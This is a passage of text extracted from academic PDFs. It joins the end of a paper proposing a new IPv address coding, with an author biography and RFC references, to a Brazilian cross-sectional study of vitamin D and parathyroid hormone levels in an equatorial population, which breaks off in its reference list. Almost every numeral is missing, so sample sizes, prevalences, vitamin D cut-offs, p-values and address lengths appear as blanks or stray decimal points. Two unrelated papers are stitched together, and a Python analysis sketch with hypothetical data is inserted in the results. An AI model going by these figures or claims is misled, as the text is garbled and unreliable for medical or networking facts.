are prefixed by as the address format. 
due to the length of this article, only the address format in the ipv address architecture is described in detail. for more knowledge of ipv , please refer to the related articles. vi. the conclusion ipv is the core and key technology of the next generation internet. in this paper, ipv address coding is researched and a new address coding is proposed.ipv increases the length of ip addresses from bits and bits to bits, and the default is bits, to support more address hierarchies, more addressable nodes, and simpler automatic address configurations. in order to reduce the network overhead, the fixed location method is adopted, international journal of advanced network, monitoring and controls volume , no. , changed the encoding of header options to allow more efficient forwarding. reduce restrictions on option length for greater flexibility in introducing new options in the future. ipv adds expansionary support for ip address encryption and authentication, data integrity, and data privacy (optional). the new network address is not only the update and upgrade of the old network address, but also a brand new internet system structure, which has laid a solid foundation for promoting the extensive application and integrated development of internet and internet of things. introduction of xie jianping xie jianping, male, was born in shanghai, china in . he is a chinese expert in the international standards organization (iso/iec jtc /so ). as the "decimal network standard working group" and "electronic labeling standard working group data format group" of the ministry of industry and information technology of the people's republic of china, the "new generation security controllable information network technology platform overall design" expert group and the internet of things joint standards working group leader of the team. it is also the main editor of the iso/c "future network naming and addressing" chinese member. professor xie has obtained more than multinational patents. the patents on network resources, terminal equipment, networks transmission and information platform include "methods for allocating addresses to computers using internet with full digital codes" and "methods for allocating computer addresses with all-decimal algorithms for networked computers", "method and apparatus for implementing trusted network connection through a router or switch", "method for uniformly compiling and allocating addresses of networked computers and intelligent terminals", "decimal gateway", "an ipv /ipv nat router", "an ipv website browser plugin", "a new generation of ipv routers", "a networked tax control system and its method" and "digital remote video surveillance system device" reference [ ] xie jianping etc. a method of ssigning addresses to network computers using the full decimal algorithm[p]. cn: zl . , . . . [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] rfc – internet standard. internet protocol, darpa internet program protocol specification, rfc , . . [ ] p. srisuresh. network working group. ip network address translator (nat) terminology and considerations. rfc- , . . [ ] v. fuller. network working group. classless inter-domain routing (cidr):the internet address assignment and aggregation plan. rfc- , . . [ ] ross callon. tcp and udp with bigger addresses (tuba), a simple proposal for internet addressing and routing. 
rfc- , . .

vitamin d and pth: data from a cross-sectional study in an equatorial population

natércia neves marques de queiroz, franciane trindade cunha de melo, fabrício de souza resende, luísa corrêa janaú, norberto jorge kzan de souza neto, manuela nascimento de lemos, ana carolina lobato virgolino, maria clara neres iunes de oliveira, angélica leite de alcântara, lorena vilhena de moraes, tiago franco david, wanderson maia da silva, scarlatt souza reis, márcia costa dos santos, ana carolina contente braga de souza, pedro paulo freire piani, neyla arroyo lara mourão, karem mileo felício, joão felício abrahão neto and joão soares felício
university hospital joão de barros barreto, federal university of pará, endocrinology division, belem, pará, brazil
correspondence should be addressed to j s felício: felicio.bel@terra.com.br

abstract
objective: investigate the prevalence of vitamin d deficiency in an equatorial population through a large-sample study.
methods: cross-sectional study with , healthy individuals from the north region, in brazil (amazônia – state of pará), who had -hydroxy-vitamin d ( (oh)d) and intact parathyroid hormone (pth) serum levels measured by immunoassay method. those with history of acute or chronic diseases were excluded. abnormal levels of calcium, creatinine, glycemia and albumin were also exclusion criteria.
results: (oh)d levels were . ± . ng/ml and values < . ng/ml were equal to < − s.d. below average. hypovitaminosis d was present in % of subjects according to the institute of medicine (values < ng/ml) and in %, in consonance with endocrine society (values – ng/ml as insufficiency and < ng/ml as deficiency) criteria. individuals were divided according to four age brackets: children, adolescents, adults and elderly, and their (oh)d levels were: ± ; . ± . ; . ± . ; . ± . ng/ml, respectively. all groups differed in (oh)d, except adolescents vs adults. regression model showed bmi, sex, living zone (urban or rural) and age as independent variables to (oh)d levels. comparing subjects with vitamin d deficiency (< ng/ml) to those with vitamin d insufficiency ( – ng/ml), a difference between pth levels in these two groups was observed ( . ± . pg/ml vs . ± . pg/ml; p < . ). additionally, the most accurate predictive vitamin d level for subclinical hyperparathyroidism in roc curve was ng/ml.
conclusion: our equatorial population showed low prevalence of vitamin d hypovitaminosis ranging with age bracket. the insufficient category by endocrine society was corroborated by our pth data.
key words: epidemiology; endocrinology; hypovitaminosis d; vitamin d

introduction
the institute of medicine (iom) defines normality of vitamin d as serum -hydroxy-vitamin d ( (oh)d) levels above ng/ml, based on the dietary intake needed to meet the requirements for at least . % of the population ( ). according to this criterion, several studies worldwide have shown high rates of hypovitaminosis d, with an estimate of – %, in european, asian, african and south american countries ( , , ). therefore, hypovitaminosis d has been listed as a public health problem, as one billion people presented (oh)d deficiency ( ), with a prevalence ranging from to %, depending on cut-off points and selected population ( ). in addition, manson et al. ( ), in , in a re-analysis of iom data, suggested there was an overestimation in the diagnosis of hypovitaminosis d and believed that sufficiency is reached when serum vitamin d is above . ng/ml. bouillon ( ), in a review, stated that all guidelines are unanimous in recommending avoidance of (oh)d levels below ng/ml, as well as highlighted the controversy involving levels between and ng/ml, which might not indicate deficiency necessarily for the whole population. besides the global controversy, large population studies trying to evaluate vitamin d levels in equatorial populations are rare. little data are available from a small number of locations such as kenya, dr congo and colombia ( , ). in brazil, few studies have been carried out to demonstrate the hypovitaminosis d prevalence in healthy subjects. therewithal, given the country's length, there is considerable climatic difference between the regions and, as far as we are aware, there is no previous study in the amazonian region. therefore, it remains unclear whether the current diagnostic criterion for vitamin d deficiency might cause overdiagnosis of this condition. in this context, investigating the prevalence of vitamin d deficiency in an equatorial population, such as ours, through a large-sample study becomes meaningfully important.

method
study design and data collection
a cross-sectional study was performed to evaluate serum levels of (oh)d, intact pth and ionized calcium. all our subjects lived in the state of pará (coordinates: . °s . °w), located in the north region of brazil (fig. ). being near the equator, pará constantly experiences hot climate and humid weather with little seasonal variation, as do most equatorial areas, which is the reason we did not include seasonality in this study ( ). usual uv index throughout the year ranges from to , being classified as 'very high', based on world health organization (who) criteria ( , ). total mean insolation is . h/year and total mean irradiation is . kwh/m day ( , ). data were collected from january to december . a total of , subjects of both sexes and different age groups who had (oh)d serum levels measured at a local laboratory service from january to december of were included in the study. all subjects answered a questionnaire; those with previous history of acute or chronic diseases (hypertension, chronic kidney failure, chronic liver disease, autoimmune diseases) were excluded, as well as pregnant women and those taking any medications, including patients who supplemented vitamin d. subjects who presented abnormal results of serum ionized calcium, creatinine, glycemia and serum albumin were also not eligible (reference values: . – . mmol/l, . – . mg/dl (men) and . – . mg/dl (women), . – . g/dl, respectively). individuals who had both vitamin d and pth collected were divided into a smaller group of healthy individuals and were analyzed separately, in order to properly interpret their data.
information regarding age, sex, bmi and living zone were collected. patients were divided according to the age groups defined by who, in , as children ( – years old), teenagers ( – years old), adults ( – years old) and elderly (above years old). the impact of seasonality was not evaluated because there are not established patterns of seasons in our region ( , ). this study was approved by university hospital joão de barros barreto ethics committee, caae number . . . . assay individuals’ blood was collected and, then, serum (oh)d was measured quantitatively by the following kit: diasorin liaison -oh-vitamin d total figure  state of pará (north region, brazil). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : chemiluminescence immunoassay (diasorin, stillwater, mn, usa) ( ). diasorin liaison is one of the methods to evaluate (oh)d tested by deqas (vitamin d external quality assessment scheme), the largest specialist external quality assessment (proficiency testing) scheme for the vitamin d metabolites (oh)d and , (oh) d, thus reinforcing the accuracy of our analysis ( ). quantitative serum intact parathyroid hormone (pth) was determined by electrochemiluminescence (modular analytics, e , roche). serum albumin was assessed by enzymatic methodology. concentration of plasmatic glucose was determined by the hexokinase method. creatinine was measured through kinetic alkaline picrate assays. ionized calcium was calculated based on total calcium, protein and albumin. statistical analysis vitamin d was tested for its normal distribution through the kolmogorov–smirnov test. the mean and the s.d. of (oh)d levels were calculated. to establish correlations between (oh)d levels and variables such as sex, age, bmi and living zone (urban or rural), pearson or spearman tests were used. stepwise multiple regression analysis and simple linear regression were also performed to evaluate the degree of influence of other variables in serum (oh)d levels. the spss statistics ® (ibm corp.) and rstudio ide (rstudio, inc.) software were used for quantitative statistical analysis. the p value < . was considered statistically significant. as for the subjects dosed for intact pth, a receiver operating characteristic (roc) curve was constructed to determine the most accurate vitamin d level to predict subclinical hyperparathyroidism (sht). the cut-off point with maximum sensitivity and specificity in the roc curve was defined as the minimum value in the equation (( − sensitivity) + ( − specificity)) and the precision was estimated based on the area under the roc curve. results in our study, , individuals of both sexes and different age groups were analyzed. the age of the subjects was . ± . years, ranging from to ( ± . in females vs ± . in males, p < . ) and bmi was . ± . kg/m . regarding sex, , ( %) were female and ( %) were male. they were divided into four age groups: children ( – years old), adolescents ( – ), adults ( – ) and elderly (≥ ). in our study, there were ( . %) children, ( . %) adolescents, , ( . %) adults and ( . %) elderly. (oh) d levels were . ± . 
ng/ml and values < . ng/ml were equal to < − s.d. below average. all groups differed in age and bmi, as shown in table . regarding the distribution of vitamin d levels according to each age bracket in our population, all groups differed between one another, except adolescents vs adults (fig. and table ). furthermore, regarding sex, (oh)d levels were higher in males in all groups (table ). only subjects ( %) were below − s.d. the median ( th– th percentile) was . ng/ml ( . – . ). hypovitaminosis d was present in % ( ) of subjects according to the institute of medicine (in which abnormal values are those < ng/ml) and in % ( , ), in consonance with endocrine society (which defines values between and ng/ml as insufficiency and values < ng/ml as deficiency) criteria. the prevalence of hypovitaminosis d around the world and in our population (according to age groups) is summarized in tables and . the subjects were from different cities in the state of pará and those living in urban areas showed lower (oh)d levels when compared to those living in rural areas ( . vs . ng/ml, p < . ). the levels of (oh)d correlated with bmi (r = − . ; p < . ) and age (r = − . ; p < . ). our forward stepwise regression model showed bmi, sex, living zone and age as independent variables to (oh)d levels (b = − . (ci: − . to − . ), r = . , p < . ; b = . (ci: . – . ), r = . , p < . ; b = − . (ci: − . to − . ), r = . , p < . ; b = . (ci: . – . ), table  clinical and laboratory characteristics according to age groups. children adolescents adults elderly pn= n= n= , n= age (years) .  ±  .  ±  . .  ±  . .  ±  . < . a sex (f/m) (%) / / / / < . a (oh)d (ng/ml)  ±  .  ±  . .  ±  . .  ±  . < . b bmi (kg/m )  ±  . .  ±  . .  ±  . .  ±  . < . a ap <  . between all groups. bp <  . between all age groups except adults vs adolescents (p =  . ). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : r = . , p < . ). these variables showed a poor prediction power, altogether being capable of determining only . % of (oh)d levels. an inclination coefficient of − . was obtained using bmi and vitamin d level as variables in a simple linear regression model according to the formula vitamin d level = . − ( . × bmi), which suggests that, for each bmi unit gained, there would be a decrease of . ng/ml in vitamin d levels. the subjects who had pth analyzed were divided into two subgroups according to (oh)d levels: subgroup (< ng/ml) and subgroup ( – ng/ml). a difference between pth levels in these two groups was observed ( . ± . pg/ml vs . ± . pg/ml; p < . ). the proportion of individuals with abnormal pth, in subjects with vitamin d deficiency or insufficiency according to endocrine society, is presented in fig. . in addition, the percentage of functional hypoparathyroidism (hypovitaminosis d with normal pth levels) among patients with vitamin d insufficiency ( – ng/ml) and deficiency (< ng/ml) was . % and . %, respectively (p < . ). 
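as a rough illustration of the procedures described in the statistical analysis section, the sketch below fits a simple linear regression of (oh)d on bmi and then selects the roc cut-off that minimises ( − sensitivity) + ( − specificity). it uses hypothetical, randomly generated arrays rather than the study data, and scikit-learn is assumed; names and values are placeholders.

```python
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.metrics import roc_curve, auc

# hypothetical data standing in for the study variables (not the real measurements)
rng = np.random.default_rng(0)
bmi = rng.normal(27, 4, 500)                                   # body mass index
vitd = 40 - 0.5 * bmi + rng.normal(0, 6, 500)                  # 25(oh)d, ng/ml
high_pth = (vitd + rng.normal(0, 5, 500) < 25).astype(int)     # 1 = elevated pth

# simple linear regression of 25(oh)d on bmi: the slope estimates the change in
# vitamin d (ng/ml) per bmi unit gained
reg = LinearRegression().fit(bmi.reshape(-1, 1), vitd)
print(f"vitamin d = {reg.intercept_:.1f} + ({reg.coef_[0]:.2f} x bmi)")

# roc-based cut-off: lower vitamin d should predict elevated pth, so the score is
# the negated level; the chosen threshold minimises (1 - sensitivity) + (1 - specificity)
fpr, tpr, thr = roc_curve(high_pth, -vitd)
best = np.argmin((1 - tpr) + fpr)
print("auc:", round(auc(fpr, tpr), 3))
print("cut-off (ng/ml):", round(float(-thr[best]), 1),
      "sensitivity:", round(float(tpr[best]), 2),
      "specificity:", round(float(1 - fpr[best]), 2))
```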
according to the roc curve, the vitamin d value established as the cut-off point for pth response to vitamin d insufficiency and, in consequence, for increased risk of bone loss, in our sample was ng/ml, with sensitivity of . %, specificity of . % and accuracy of . %. the roc curve also presented accuracy of . %, positive likelihood ratio of . and negative likelihood ratio of . . in addition, we found that in ( %) of our individuals who had pth analyzed showed subclinical hyperparathyroidism. discussion our study showed low prevalence of hypovitaminosis d, ranging with age bracket, when compared to other countries, according to both iom and endocrine society (es) criteria, even when compared to other equatorial populations. in addition, the insufficient category by es was corroborated by our pth data. currently, due to laboratory assays and the variability of their cut-off points, (oh)d levels above ng/ml are accepted as appropriate by endocrine society, once this value would ensure a satisfactory action with no toxicity risk. in , es defined values between and ng/ml as insufficiency and values < ng/ml as deficiency ( ). iom, based on the dietary intake needed to meet the requirements of the population, established vitamin d deficiency as levels < ng/ml ( , ). they also suggest that each population should establish their specific criteria to decide about (oh)d supplementation. nevertheless, manson et al. ( ), while assessing data from the national health and nutrition examination survey (nhanes), suggested < . ng/ml as a cut-off. if manson’s proposition were used in our population, prevalence of vitamin d hypovitaminosis would be extremely low compared to other countries in the equatorial zone ( , ). therefore, it could indicate that specific population factors, such as latitude and mean insolation, might be of great importance to determine serum levels of (oh)d. in brazil, few population studies address this aspect. unger ( ) performed a transversal study in são paulo, evaluating volunteers aged – years in . the author found that . % of the participants showed vitamin d insufficiency and . % showed (oh)d deficiency. scalco et  al., in a research with noninstitutionalized seniors, found that the prevalence of vitamin d hypovitaminosis was higher ( . %) ( ). finally, linhares et al. studying children at recife, figure  (oh)d distribution according to age bracket. table   (oh)d levels (ng/ml) according to sex, separated into age groups. age/sex n male female p general , .  ±  . .  ±  . < . children  ±  .  ±  . < . adolescents .  ±  .  ±  . < . adults , .  ±  . .  ±  . < . elderly .  ±  . .  ±  . < . this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : brazil, did not find cases of vitamin d deficiency ( ). all those studies used endocrine society parameters of normality. the first two studies occurred in the south-southeast region of brazil ( °– ° s), with lower mean insolation, which could justify the higher hypovitaminosis d prevalence compared to our data. 
the third study, which evaluated just a selected children population, found no case of hypovitaminosis d and occurred in the northeast region of brazil, in a city with latitude close to ours. those last findings suggest that latitude, mean insolation and age must be considered when establishing normal vitamin d values in a population, which reinforces our findings about age bracket influence on vitamin d. in addition, we found higher levels of (oh)d in males. one possible explanation would be a greater sun exposure of the thorax – which is a region of better absorption of (oh)d. our results are in agreement with the findings of al-ghamdi ( ) and kiani et  al. ( ). the former evaluated subjects from saudi arabia and observed vitamin d lower in girls, probably because of their dressing costumes. in amazonia, due to the hot weather, men usually dress shirtless and, consequently, have a higher thorax exposure. another hypothesis would be the influence of testosterone levels. it has been suggested that testosterone levels could be associated with higher (oh)d levels ( , , , ). in fact, araujo et  al. also described vitamin d levels higher in males than in females, also suggesting this hormonal influence ( ). a possible mechanism that could explain this association is not well established. our data also showed a decrease in circulating concentrations of serum (oh)d while bmi increased, which indicates that poor vitamin d levels are linked with higher bmi. the proposed mechanisms to explain this include a lack of sun exposure, modified vitamin d table  prevalence of (oh)d deficiency in different countries. reference country n age range prevalence < ng/ml (munns et al. ( )) prevalence < ng/ml (iom) prevalence < ng/ml (es) queiroz et al. ( ) north brazil , – . % . % % mogire et al. ( ) africa countries , – . % . % . % cashman et al. ( ) europe , – % . % – eloi et al. ( ) southeast brazil (são paulo) , – – . % . % kiani et al. ( ) pakistan . – – – . % ramnemark et al. ( ) northern sweden – – . % – gill et al. ( ) northeast australia – – . % – unger et al. ( ) southeast brazil (são paulo) – – – % es, endocrine society; iom, institute of medicine. table  prevalence of vitamin d deficiency in our population according to different criteria. vitamin d cut-offs (ng/ml) < (munns et al. ( )) < (iom) < (es) children (%) n= . . . adolescents (%) n= . . . adults (%) n= , . . . elderly (%) n= . . . total (%) n= , . . . figure  distribution of patients with secondary hyperparathyroidism according to vitamin d status (endocrine society). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : activation and increased vitamin d storage in adipose tissue ( , , ). indeed, obese individuals expose themselves less to solar uv radiation, diminishing cutaneous synthesis of vitamin d from -dehydrocholesterol ( ). it was showed, in a study with obese patients, a higher prevalence of hypovitaminosis in this group, as none of them had the habit of sunbathing. 
their clothes used to cover as much skin as possible, generating the hypothesis that low concentrations of vitamin d may be related to low sun exposure in those patients ( ). eloi et al. ( ), in a similar research in são paulo, based on the es, performed an investigation in patients aged from to years, and observed vitamin d concentrations < ng/ml in . % of the patients, presenting higher vitamin d levels in summer ( . %) when compared to winter ( . %). in our study, it was not possible to assess this issue, due to the lack of proper season distinction in the state of pará, which is situated near the equator line presenting higher insolation throughout the year. our study showed that people living in rural areas have higher vitamin d levels. this finding agrees with a meta-analysis that took place in african countries recently ( ). however, it remains a controversial topic. fang et al. ( ), in a study based in china, with subjects, showed slightly higher vitamin d levels among urban residents compared to rural ones, but also pointed out that its results are opposed to many similar researches in asia ( , , , ). similarly, an indian study demonstrated lower (oh)d levels in rural subjects despite plentiful sun exposure ( ). in our region, the dressing habits of countryside inhabitants, such as using lighter and fewer clothes, and the fact that rural areas have less impairment of sun exposure due to shorter buildings could influence our results. in fact, kimli et  al. ( ) established skin exposure as the single strongest contributor to the explained variance in (oh)d. however, this issue needs to be better analyzed. the variables studied in our regression model showed a low predictive power, being capable of determining only . % of (oh)d levels. an important hypothesis that could explain these findings is the assessment of polymorphism consequences for the vitamin d receptor (vdr) function. this individual genetic diversity could play a central role in determining (oh)d levels ( , , , ). according to nissen ( ), who analyzed twenty- five different genetic variants in seven different genes, it was concluded that polymorphisms in the cyp r and gc genes are associated with serum variations in the vitamin d. in this same perspective, husain et al. ( ), who compared americans with european and african ancestry with similar lifestyles and demographic conditions, demonstrated that those with african ancestry had lower (oh)d values. both studies suggest that specific ethnic and genetic determinants may influence vitamin d levels. in brazil, the expressive miscegenation makes ethnic analysis difficult. this could explain the difference between hypovitaminosis d prevalence in our study when compared to those from the rest of the world. analyzing the roc curve in this study, we found that vitamin d level of ng/ml is the best cut-off point for the pth response to vitamin d insufficiency and, consequently, for increased risk of bone loss. it suggests that subjects with vitamin d levels lower than ng/ml could have an additional benefit in supplementation, since a large number of people who fit in this condition are asymptomatic to shp. according to es definitions, this value is classified as insufficiency, reinforcing that this group of individuals should receive special attention in clinical practice. another aspect that should be addressed is the method for assessing vitamin d. liquid chromatography– mass spectrometry is considered the gold standard for measuring (oh)d. 
it has the advantage of allowing sample adaptation and high specificity; however, it is a complex, expensive and rarely available assay ( ). the automated immunoassay is the most widely used method globally, standardized in clinical practice, as it is easier to perform, faster and less costly ( , ). in our study, aiming at the clinical applicability of the findings, the automated immunoassay was used. in brazil, low vitamin d intake is commonly observed. filgueiras et  al. ( ) found an elevated prevalence of inadequate vitamin d intake ( . %) among children. peters et al. ( ), studying adolescents, and cembranel et al. ( ), assessing patients between and years, described that . % and % of subjects did not meet the daily adequate intake recommendation of vitamin d. in , a national dietary survey with brazilian elderly stated that our region had more adequate levels of vitamin d intake when compared to other regions of brazil, even though inadequacy was still very present ( ). this might contribute to the lower prevalence of vitamin d hypovitaminosis in our population. skin pigmentation also might have an influence in vitamin d levels. libon et  al. ( ), in a research with fitzpatrick skin types ii, iii (fair-skinned) and vi (black- skinned) individuals, found that after a single total body uvb exposure fair-skinned people presented higher levels of vitamin d when compared to black-skinned people. in agreement, a systematic review conducted by this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study : xiang et al. ( ) concludes that vitamin d production was less effective in those with pigmented skin. in the north region of brazil, black people correspond solely to . % of the population ( ). this also might have influenced our results. in fact, as a limitation of our study, we did not consider the amount of time of exposure to sunlight, skin type and vitamin d daily dietary intake, which are known as important factors impacting serum vitamin d levels. finally, the low prevalence of hypovitaminosis d in our population was established by iom criteria of ng/ml, using data from our , subjects who performed (oh)d serum dosage. on the other hand, the value of ng/ml resulted from a roc curve constructed to determine the most accurate vitamin d level to predict subclinical hyperparathyroidism, which should be considered for treatment in risk groups for bone mass loss, for example. however, it would not be a general population cut-off point. conclusion our equatorial population showed low prevalence of vitamin d hypovitaminosis, according to both iom (< ng/ml) and es criteria (< ng/ml), ranging with age bracket. the insufficient category by endocrine society was corroborated by our pth data. since our regression model could only determine . % of the vitamin d levels, the individual characteristics of each subject should be taken into account to establish inadequate levels of vitamin d. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. 
funding this work did not receive any specific grant from any funding agency in the public, commercial, or not-for-profit sector. ethics approval and consent to participate our study was approved by the human research ethics committee. the committee waived the requirement for written informed consent for participants in this study in accordance with the national legislation, resolution / (national health council) and the institutional requirements due to the fact that it is a database population study with confidentiality and non-identification guarantee. consent for publication all authors approved the manuscript and consent to this submission. availability of data and material the datasets analyzed during the current study are available from the corresponding author on reasonable request. author contribution statement all persons who meet authorship criteria are listed as authors, and all authors certify that they have participated sufficiently in the work to take public responsibility for the content, including participation in the concept, design, analysis, writing, or revision of the manuscript. k m f, j s f and n n m q took part in conception and design of study. a l a, l v m, t f d, n a l m, w m s and a c c b s were responsible for acquisition of data, while l c j, j s f, s s r, n j k s n, p p f p and j f a n have done the analysis and interpretation of data. m n l, a c l v, f t c m, f s r, l m c f and m c n i o have drafted the manuscript together. all authors have revised the manuscript critically and approved the version to be published. acknowledgements the authors thank amaral costa laboratory and programa de pós graduação em oncologia e ciências médicas of hujbb for their contribution to the research. references maeda ss, borba vzc, camargo mbr, silva dmw, borges jlc, bandeira f, lazaretti-castro m & brazilian society of endocrinology and metabology (sbem). recommendations of the brazilian society of endocrinology and metabology (sbem) for the diagnosis and treatment of hypovitaminosis d. arquivos brasileiros de endocrinologia e metabologia – . (https://doi.org/ . / - ) mogire rm, mutua a, kimita w, kamau a, bejon p, pettifor jm, adeyemo a, williams tn & atkinson sh. prevalence of vitamin d deficiency in africa: a systematic review and meta-analysis. lancet: global health e –e . (https://doi.org/ . /s - x( ) - ) cashman kd, dowling kg, Škrabáková z, gonzalez-gross m, valtueña j, de henauw s, moreno l, damsgaard ct, michaelsen kf, mølgaard c, et al. vitamin d deficiency in europe: pandemic? american journal of clinical nutrition – . (https:// doi.org/ . /ajcn. . ) holick mf. the vitamin d deficiency pandemic: approaches for diagnosis, treatment and prevention. reviews in endocrine and metabolic disorders – . (https://doi.org/ . / s - - - ) hilger j, friedel a, herr r, rausch t, roos f, wahl da, pierroz dd, weber p & hoffmann k. a systematic review of vitamin d status in populations worldwide. british journal of nutrition – . (https://doi.org/ . /s ) manson je, brannon pm, rosen cj & taylor cl. vitamin d deficiency – is there really a pandemic? new england journal of medicine – . (https://doi.org/ . / nejmp ) bouillon r. comparative analysis of nutritional guidelines for vitamin d. nature reviews: endocrinology – . (https:// doi.org/ . /nrendo. . ) hernando vu, andry mm, maría virginia pf & valentina a. vitamin d nutritional status in the adult population in colombia – an analytical cross-sectional study. heliyon e . (https://doi. org/ . /j.heliyon. .e ) national geographic. 
equator. washington, dc, usa: national geographic. (available at: https://www.nationalgeographic.org/ encyclopedia/equator/) this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . / - https://doi.org/ . /s - x( ) - https://doi.org/ . /s - x( ) - https://doi.org/ . /ajcn. . https://doi.org/ . /ajcn. . https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /s https://doi.org/ . /nejmp https://doi.org/ . /nejmp https://doi.org/ . /nrendo. . https://doi.org/ . /nrendo. . https://doi.org/ . /j.heliyon. .e https://doi.org/ . /j.heliyon. .e https://www.nationalgeographic.org/encyclopedia/equator/ https://www.nationalgeographic.org/encyclopedia/equator/ https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n neves marques de queiroz et al. vitamin d and pth: a cross-sectional study pb–xx : nasa earth observations. uv index. greenbelt, md, usa: neo. (available at: https://neo.sci.gsfc.nasa.gov/view. php?datasetid=aura_uvi_clim_m) world health organization. ultraviolet (uv) index. geneva switzerland: who, . (available at: https://www.who.int/news- room/q-a-detail/ultraviolet-(uv)-index) national institute of meteorology. meteorological database for teaching and research. brasília, brasil: inmet. (available at: http:// www.inmet.gov.br/portal/index.php?r=bdmep/bdmep) national space research institute. solar and terrestrial radiation. são josé dos campos, brazil: dsa. (available at: http://satelite.cptec. inpe.br/radiacao/) machado lat, laurent h, dessay n & miranda i. seasonal and diurnal variability of convection over the amazonia: a comparison of different vegetation types and large scale forcing. theoretical and applied climatology – . (https://doi.org/ . /s - - - ) nobre ca, obregón go, marengo ja, fu r & poveda g. characteristics of amazonian climate: main features. in geophysical monograph series, – . eds m keller, m bustamante, j gash & ps dias. washington, dc, usa: american geophysical union, . (https://doi.org/ . / gm ). diasorin. liaison oh vitamin d total assay [brochure]. stillwater, mn, usa: diasorin. (available at: https://www.diasorin. com/en/node/ ) deqas. vitamin d external quality assessment scheme. deqas review / . london, uk: deqas. (available at: http://www. deqas.org/downloads/deqas% review% october% .pdf) holick mf, binkley nc, bischoff-ferrari ha, gordon cm, hanley da, heaney rp, murad mh, weaver cm & endocrine society. evaluation, treatment, and prevention of vitamin d deficiency: an endocrine society clinical practice guideline. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) institute of medicine (iom). dietary reference intakes for calcium and vitamin d. pediatrics e . (https://doi.org/ . / peds. - ) ross ac, manson je, abrams sa, aloia jf, brannon pm, clinton sk, durazo-arvizu ra, gallagher jc, gallo rl, jones g, et al. the report on dietary reference intakes for calcium and vitamin d from the institute of medicine: what clinicians need to know. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ). unger md. determinação dos níveis séricos de vitamina d em uma amostra de indivíduos saudáveis da população brasileira. são paulo. 
doctoral dissertation (science doctorate), the faculty of medicine of the univeristy of são paulo, . scalco r, premaor mo, fröehlich pe & furlanetto tw. high prevalence of hypovitaminosis d and secondary hyperparathyroidism in elders living in nonprofit homes in south brazil. endocrine – . (https://doi.org/ . /s - - - ) linhares er, jones da, round jm & edwards rht. effect of nutrition on vitamin d status: studies on healthy and poorly nourished brazilian children. american journal of clinical nutrition – . (https://doi.org/ . /ajcn/ . . ) al-ghamdi ma, lanham-new sa & kahn ja. differences in vitamin d status and calcium metabolism in saudi arabian boys and girls aged to years: effects of age, gender, extent of veiling and physical activity with concomitant implications for bone health. public health nutrition – . (https://doi.org/ . / s ) kiani ra, asad mj, abbasi s, farooq n & khan mu. prevalence of vitamin-d deficiency in urban population: a retrospective analysis. annals of pakistan institute of medical sciences – . santos ho, howell s, nichols k & teixeira fj. reviewing the evidence on vitamin d supplementation in the management of testosterone status and its effects on male reproductive system (testis and prostate): mechanistically dazzling but clinically disappointing. clinical therapeutics e –e . (https://doi.org/ . /j. clinthera. . . ) pilz s, frisch s, koertke h, kuhn j, dreier j, obermayer-pietsch b, wehr e & zittermann a. effect of vitamin d supplementation on testosterone levels in men. hormone and metabolic research – . (https://doi.org/ . /s- - ) wehr e, pilz s, boehm bo, märz w & obermayer-pietsch b. association of vitamin d status with serum androgen levels in men. clinical endocrinology – . (https://doi.org/ . / j. - . . .x) iyengar r, maceda c, beebe h, crowley l, woodward m, bar- chama n & mclaughlin ma. mp - association between testosterone, vitamin d and cardiovascular risk. journal of urology e . (https://doi.org/ . /j.juro. . . ) santos araújo epd, queiroz djm, neves jpr, lacerda lm, gonçalves mdcr & carvalho at. prevalence of hypovitaminosis d and associated factors in adolescent students of a capital of northeastern brazil. nutricion hospitalaria – . (https://doi.org/ . /nh. ) bell nh, epstein s, greene a, shary j, oexmann mj & shaw s. evidence for alteration of the vitamin d-endocrine system in obese subjects. journal of clinical investigation – . (https:// doi.org/ . /jci ) compston je, vedi s, ledger je, webb a, gazet jc & pilkington tr. vitamin d status and bone histomorphometry in gross obesity. american journal of clinical nutrition – . (https:// doi.org/ . /ajcn/ . . ) eloi m, horvath dv, szejnfeld vl, ortega jc, 